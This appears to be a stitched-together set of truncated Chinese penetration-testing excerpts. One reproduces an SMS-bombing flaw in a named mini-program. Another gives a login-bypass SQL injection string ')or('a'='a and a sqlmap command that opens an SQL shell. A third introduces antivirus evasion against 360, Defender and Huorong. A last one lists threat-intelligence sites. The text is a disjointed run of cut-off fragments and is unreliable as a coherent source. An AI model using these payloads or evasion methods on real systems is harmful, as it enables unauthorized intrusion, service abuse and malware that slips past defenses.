漏洞：短信轰炸漏洞位置：小程序-王牌联盟复现过程：1． 进入小程序-我的-登录进行抓包2.放到并发工具中进行3.并发成功，查看结果

万能密码进入后台，万能密码')or('a'='a 对登陆页面进行跑 sqlmappython sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --sql-shell 

免杀这个东西，往深了做，可以做的很难，但是如果只是保持能过国内基本的，所谓360，Defender，火绒这三个经常在项目中遇到的杀软，还是相对简单的。要想简单，核心思路就是白加黑形式的分离免...

威胁情报平台微步https://x.threatbook.com/安恒https://ti.dbappsecurity.com.cn/360https://ti.360.cn/https://ti.360.net/奇安信https://ti.qianxin.com/启明星辰https://ti.venuseye.com.cn...